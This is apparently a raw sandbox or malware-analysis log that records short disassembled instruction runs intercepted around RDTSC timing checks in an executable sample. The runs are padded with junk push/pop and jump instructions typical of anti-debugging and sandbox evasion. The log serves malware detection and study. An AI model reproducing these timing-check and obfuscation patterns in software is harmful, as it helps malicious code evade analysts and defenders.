Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145DA00 second address: 145DA41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCB4545A1B2h 0x0000000b jnp 00007FCB4545A1A6h 0x00000011 jmp 00007FCB4545A1B4h 0x00000016 popad 0x00000017 ja 00007FCB4545A1B2h 0x0000001d jns 00007FCB4545A1A6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145DB4D second address: 145DB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145DB51 second address: 145DB68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCB4545A1AFh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145DD09 second address: 145DD0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145DD0D second address: 145DD30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1AEh 0x00000007 jmp 00007FCB4545A1B1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145DD30 second address: 145DD3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FCB44FB4546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145DD3B second address: 145DD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145DD41 second address: 145DD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14622E3 second address: 14622E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14622E7 second address: 14622EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14622EF second address: 14622F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14622F5 second address: 14622F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1471FA4 second address: 1471FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1471FAF second address: 1471FCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4559h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1471FCE second address: 1471FDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCB4545A1A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 146D742 second address: 146D757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jnp 00007FCB44FB4552h 0x0000000d jnl 00007FCB44FB4546h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 147EFDB second address: 147EFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCB4545A1AFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1482311 second address: 1482315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1482315 second address: 148232A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FCB4545A1A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jno 00007FCB4545A1A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 148232A second address: 148234F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCB44FB454Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCB44FB4552h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 148234F second address: 1482359 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCB4545A1C5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14970EA second address: 14970F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1495E9A second address: 1495EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCB4545A1B6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 149647D second address: 1496487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FCB44FB4546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1496487 second address: 1496496 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCB4545A1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14968DA second address: 14968DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14968DF second address: 14968E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14968E7 second address: 14968EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14968EB second address: 1496917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FCB4545A1FAh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCB4545A1B6h 0x00000015 jns 00007FCB4545A1A6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1496917 second address: 1496948 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCB44FB4546h 0x00000008 jmp 00007FCB44FB4557h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FCB44FB454Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 149E4AC second address: 149E4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 149E4B2 second address: 149E4DA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCB44FB454Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FCB44FB454Eh 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 149E4DA second address: 149E4FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B9h 0x00000007 jp 00007FCB4545A1ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0311 second address: 4DB0315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0315 second address: 4DB031B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB031B second address: 4DB033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4552h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 mov dh, 11h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB033B second address: 4DB036F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e mov edx, 3A4C25E4h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FCB4545A1B6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB03CF second address: 4DB03D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB03D3 second address: 4DB03EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB03EE second address: 4DB0436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 7BCA63DAh 0x00000008 pushfd 0x00000009 jmp 00007FCB44FB454Bh 0x0000000e or esi, 4290C17Eh 0x00000014 jmp 00007FCB44FB4559h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FCB44FB454Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13ADD04 second address: 13ADD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13ADD08 second address: 13ADD12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB050B second address: 4DB052B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FCB4545A1B1h 0x00000008 pop ecx 0x00000009 push edx 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov eax, ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB052B second address: 4DB052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB05B0 second address: 4DB05CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB05CC second address: 4DB0611 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB454Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FCB44FB4559h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FCB44FB4553h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0611 second address: 4DB0617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0617 second address: 4DB0668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov edx, eax 0x00000012 pushfd 0x00000013 jmp 00007FCB44FB4558h 0x00000018 jmp 00007FCB44FB4555h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0668 second address: 4DB06CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FCB4545A1B2h 0x00000010 and esi, 564FB278h 0x00000016 jmp 00007FCB4545A1ABh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FCB4545A1B8h 0x00000022 sbb ah, FFFFFFD8h 0x00000025 jmp 00007FCB4545A1ABh 0x0000002a popfd 0x0000002b popad 0x0000002c call 00007FCBB549DAD8h 0x00000031 push 74DF27D0h 0x00000036 push dword ptr fs:[00000000h] 0x0000003d mov eax, dword ptr [esp+10h] 0x00000041 mov dword ptr [esp+10h], ebp 0x00000045 lea ebp, dword ptr [esp+10h] 0x00000049 sub esp, eax 0x0000004b push ebx 0x0000004c push esi 0x0000004d push edi 0x0000004e mov eax, dword ptr [74E80140h] 0x00000053 xor dword ptr [ebp-04h], eax 0x00000056 xor eax, ebp 0x00000058 push eax 0x00000059 mov dword ptr [ebp-18h], esp 0x0000005c push dword ptr [ebp-08h] 0x0000005f mov eax, dword ptr [ebp-04h] 0x00000062 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000069 mov dword ptr [ebp-08h], eax 0x0000006c lea eax, dword ptr [ebp-10h] 0x0000006f mov dword ptr fs:[00000000h], eax 0x00000075 ret 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB06CB second address: 4DB06CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB06CF second address: 4DB06EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB06EA second address: 4DB071A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCB44FB454Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB071A second address: 4DB0720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0720 second address: 4DB0724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0724 second address: 4DB074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007FCB4545A1AFh 0x00000010 mov esi, edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ebx, 22E881E6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB074A second address: 4DB074F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB074F second address: 4DB076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov si, 3F3Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov al, byte ptr [edx] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCB4545A1ADh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB076D second address: 4DB077D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCB44FB454Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB077D second address: 4DB07B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc edx 0x00000009 pushad 0x0000000a mov dl, CEh 0x0000000c push esi 0x0000000d call 00007FCB4545A1B5h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 popad 0x00000015 test al, al 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FCB4545A1B3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB07B9 second address: 4DB07BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB07BF second address: 4DB07C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB07C3 second address: 4DB07C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB07C7 second address: 4DB076D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FCB4545A12Dh 0x0000000e mov al, byte ptr [edx] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCB4545A1ADh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB07EC second address: 4DB0835 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FCB44FB4559h 0x00000008 xor cx, 70C6h 0x0000000d jmp 00007FCB44FB4551h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 sub edx, esi 0x00000018 pushad 0x00000019 push ebx 0x0000001a mov cx, 486Fh 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov edi, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0835 second address: 4DB0839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0839 second address: 4DB083F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB083F second address: 4DB0845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0845 second address: 4DB085E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB454Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b dec edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB085E second address: 4DB087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB087B second address: 4DB08EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ebx, dword ptr [edi+01h] 0x0000000c pushad 0x0000000d call 00007FCB44FB454Ch 0x00000012 movzx eax, dx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 mov esi, 3550E459h 0x0000001c mov cx, 6D15h 0x00000020 popad 0x00000021 popad 0x00000022 mov al, byte ptr [edi+01h] 0x00000025 jmp 00007FCB44FB4550h 0x0000002a inc edi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FCB44FB454Dh 0x00000034 xor cx, AE56h 0x00000039 jmp 00007FCB44FB4551h 0x0000003e popfd 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB08EF second address: 4DB093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b pushad 0x0000000c mov bh, D2h 0x0000000e popad 0x0000000f jne 00007FCBB5492315h 0x00000015 jmp 00007FCB4545A1AAh 0x0000001a mov ecx, edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FCB4545A1B7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB093B second address: 4DB0984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 shr ecx, 02h 0x0000000c jmp 00007FCB44FB454Eh 0x00000011 rep movsd 0x00000013 rep movsd 0x00000015 rep movsd 0x00000017 rep movsd 0x00000019 rep movsd 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FCB44FB4557h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0984 second address: 4DB09B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCB4545A1ADh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB09B2 second address: 4DB09B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB09B8 second address: 4DB0ABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 03h 0x0000000e jmp 00007FCB4545A1B6h 0x00000013 rep movsb 0x00000015 pushad 0x00000016 jmp 00007FCB4545A1AEh 0x0000001b pushfd 0x0000001c jmp 00007FCB4545A1B2h 0x00000021 sbb ecx, 3EFFE048h 0x00000027 jmp 00007FCB4545A1ABh 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000035 pushad 0x00000036 mov cl, B4h 0x00000038 pushfd 0x00000039 jmp 00007FCB4545A1B1h 0x0000003e adc si, 5D66h 0x00000043 jmp 00007FCB4545A1B1h 0x00000048 popfd 0x00000049 popad 0x0000004a mov eax, ebx 0x0000004c jmp 00007FCB4545A1AEh 0x00000051 mov ecx, dword ptr [ebp-10h] 0x00000054 pushad 0x00000055 mov ecx, 58C8D9DDh 0x0000005a mov bh, al 0x0000005c popad 0x0000005d mov dword ptr fs:[00000000h], ecx 0x00000064 pushad 0x00000065 mov cx, dx 0x00000068 call 00007FCB4545A1B7h 0x0000006d mov ch, 49h 0x0000006f pop ebx 0x00000070 popad 0x00000071 pop ecx 0x00000072 push eax 0x00000073 push edx 0x00000074 pushad 0x00000075 mov ebx, 06CB54B0h 0x0000007a jmp 00007FCB4545A1B9h 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0ABA second address: 4DB0AEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCB44FB4558h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0AEC second address: 4DB0AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0AF2 second address: 4DB0AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 4DB0AF8 second address: 4DB0AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
